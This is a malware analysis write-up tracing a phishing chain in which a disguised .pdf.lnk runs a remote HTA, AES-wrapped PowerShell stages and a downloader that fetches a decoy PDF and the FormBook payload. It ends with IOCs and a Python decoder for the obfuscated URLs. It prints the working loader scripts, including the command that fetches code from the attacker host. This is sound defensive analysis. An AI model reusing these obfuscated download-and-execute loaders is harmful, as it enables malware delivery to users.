1. Initial foothold
The attacker sent an email with an attachment named "brochure-for-2023-elite-events.rar". This rar file contains only one lnk (shortcut) file named brochure-for-2023-elite-events.pdf.lnk. If the user does not pay attention and extracts the file, it is displayed with a PDF icon like the following:
The analysis of this lnk file reveals that it utilizes powershell.exe to execute an hta script:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" \W*\\\*2\\\msh*e ('http'+'://thanhancompany[.]com/ta/pintu'+'.hta')
2. Analyzing HTA script
Download the file pintu.hta for analysis. This file contains a VBScript code snippet as follows:
To facilitate the deobfuscation of the code snippet above, I have modified it as follows:
Executing the modified pintu.hta file yields a VBScript containing a function that runs the next-stage PowerShell script.
3. Analyzing the 1st Powershell script
ZAA = "powershell[.]exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $xbFz = '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';$HMTijTI = 'bllXeHFBWFhNYU9kcHFnRFNSbk1EQVVSUmJqQm5Wb0w=';$BfslXFB = New-Object 'System.Security.Cryptography.AesManaged';$BfslXFB.Mode = [System.Security.Cryptography.CipherMode]::ECB;$BfslXFB.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$BfslXFB.BlockSize = 128;$BfslXFB.KeySize = 256;$BfslXFB.Key = [System.Convert]::FromBase64String($HMTijTI);$JmaZB = [System.Convert]::FromBase64String($xbFz);$myyVlryP = $JmaZB[0..15];$BfslXFB.IV = $myyVlryP;$xgdtNsuBK = $BfslXFB.CreateDecryptor();$KbcpSLgDq = $xgdtNsuBK.TransformFinalBlock($JmaZB, 16, $JmaZB.Length - 16);$BfslXFB.Dispose();$bDcpNBr = New-Object System.IO.MemoryStream( , $KbcpSLgDq );$OmEpFPG = New-Object System.IO.MemoryStream;$DswuaJEln = New-Object System.IO.Compression.GzipStream $bDcpNBr, ([IO.Compression.CompressionMode]::Decompress);$DswuaJEln.CopyTo( $OmEpFPG );$DswuaJEln.Close();$bDcpNBr.Close();[byte[]] $dhbwdLTm = $OmEpFPG.ToArray();$SRunF = [System.Text.Encoding]::UTF8.GetString($dhbwdLTm);$SRunF | powershell - }"
The script performs the following tasks:
- Decodes the base64 string assigned to the variable $xbFz and uses the first 16 bytes as the IV, while the remaining part is the encrypted data:
- Decodes the base64 string assigned to the variable $HMTijTI and uses it as the AES key:
- Using the key and IV, decrypts the encrypted data with AES in the mode $BfslXFB.Mode = [System.Security.Cryptography.CipherMode]::ECB (in ECB mode the IV is not actually used by AesManaged, so the 16-byte prefix is effectively just skipped):
- Since the first two bytes of the result are 0x1F 0x8B, we know that the decrypted data has been compressed using Gzip. Decompressing this data yields the next PowerShell script:
4. Analyzing the 2nd Powershell script
The important part of this script is as follows:
function Dlt($iZq)
{
$IBY = 6399;
$dtu = $Null;
foreach($kKX in $iZq)
{
$dtu += [char]($kKX - $IBY)
};
return $dtu
};
function RPJ()
{
$oUv = $env:AppData + '\';$DASUDIl= $env:AppData;$GXIrywM = $DASUDIl + '\blank.pdf ';If(Test-Path -Path $GXIrywM){Invoke-Item $GXIrywM;}Else{ $kjrkrCO = zPg (Dlt @(6503,6515,6515,6511,6514,6457,6446,6446,6508,6496,6502,6445,6518,6498,6510,6510,6508,6499,6445,6510,6513,6502,6446,6516,6511,6507,6510,6496,6499,6514,6446,6449,6447,6448,6455,6446,6447,6452,6446,6497,6507,6496,6509,6506,6445,6511,6499,6501));lWh $GXIrywM $kjrkrCO;Invoke-Item $GXIrywM;};;;$DauGlabYW = $oUv + '883.exe '; if (Test-Path -Path $DauGlabYW){pmh $DauGlabYW;}Else{ $ZbmZaJRahvY = zPg (Dlt @(6503,6515,6515,6511,6514,6457,6446,6446,6515,6503,6496,6509,6503,6496,6509,6498,6510,6508,6511,6496,6509,6520,6445,6498,6510,6508,6446,6502,6513,6504,6511,6446,6455,6455,6450,6445,6500,6519,6500));lWh $DauGlabYW $ZbmZaJRahvY;pmh $DauGlabYW;};;}RPJ;
It can be observed that the script uses the Dlt function to decode the download addresses of the next-stage files. By rewriting this function in Python and performing the decoding, we obtain the download addresses of the payload and the decoy PDF as follows:
[+] Defanged URL(s):
hxxps://mag[.]wcoomd.org/uploads/2018/05/blank.pdf
hxxps://thanhancompany[.]com/grip/883.exe
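The Dlt decoder ported to Python, as an added example (not the post's own script): it subtracts the constant 6399 from each element of the two arrays copied from the 2nd-stage script above and defangs the result the way the post does. As an extension beyond the post's case, recover_offset() infers the constant from the expected "http" prefix, so the same code works on samples that use a different constant; the function names dlt, recover_offset, defang and decode_urls are this example's own.

```python
import re

# Integer arrays passed to Dlt in the 2nd-stage PowerShell script (copied from the sample above).
DECOY_PDF_CODES = [6503,6515,6515,6511,6514,6457,6446,6446,6508,6496,6502,6445,6518,6498,6510,6510,6508,6499,6445,6510,6513,6502,6446,6516,6511,6507,6510,6496,6499,6514,6446,6449,6447,6448,6455,6446,6447,6452,6446,6497,6507,6496,6509,6506,6445,6511,6499,6501]
PAYLOAD_CODES = [6503,6515,6515,6511,6514,6457,6446,6446,6515,6503,6496,6509,6503,6496,6509,6498,6510,6508,6511,6496,6509,6520,6445,6498,6510,6508,6446,6502,6513,6504,6511,6446,6455,6455,6450,6445,6500,6519,6500]


def dlt(codes, offset=6399):
    """Port of Dlt: every element minus the constant is one character of the string."""
    return "".join(chr(c - offset) for c in codes)


def recover_offset(codes, prefix="http"):
    """Infer the subtraction constant by assuming the plaintext starts with `prefix`.

    The constant is the same for every element, so the difference between each of the
    first characters and its code must be identical. This generalisation is an
    assumption of this example, not something the post does.
    """
    if len(codes) < len(prefix):
        raise ValueError("array too short to contain the expected prefix")
    offset = codes[0] - ord(prefix[0])
    for code, ch in zip(codes, prefix):
        if code - ord(ch) != offset:
            raise ValueError("array does not decode to the expected prefix")
    return offset


def defang(url):
    """Render a URL for reports: http -> hxxp and the first dot of the host -> [.]."""
    url = re.sub(r"^http", "hxxp", url, flags=re.IGNORECASE)
    m = re.match(r"^(hxxps?://)([^/]+)(.*)$", url)
    if not m:
        return url
    scheme, host, rest = m.groups()
    return scheme + host.replace(".", "[.]", 1) + rest


def decode_urls(arrays):
    """Decode each Dlt array (recovering its constant) and return defanged URLs."""
    return [defang(dlt(codes, recover_offset(codes))) for codes in arrays]


if __name__ == "__main__":
    print("[+] Defanged URL(s):")
    for url in decode_urls([DECOY_PDF_CODES, PAYLOAD_CODES]):
        print(url)
```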
5. Formbook payload
At the time of analysis, I was able to download the payload; its sha256 is: 00f20471ea61f5b0f5a1e2e9be722369ea515aaea80283aa046bd47e51f952e4
When executed, the .NET payload unpacks the final payload, which is the FormBook malware (likely a new build of the malware).
Running the payload under FakeNet and monitoring its process shows it generating traffic to the following hosts:
6. IOCs:
Indicator | Description
hxxp://thanhancompany[.]com/ta/pintu.hta | HTA script
hxxps://mag[.]wcoomd.org/uploads/2018/05/blank.pdf | Decoy PDF
hxxps://thanhancompany[.]com/grip/883.exe | Payload URI
00f20471ea61f5b0f5a1e2e9be722369ea515aaea80283aa046bd47e51f952e4 | Payload SHA256
End.
m4n0w4r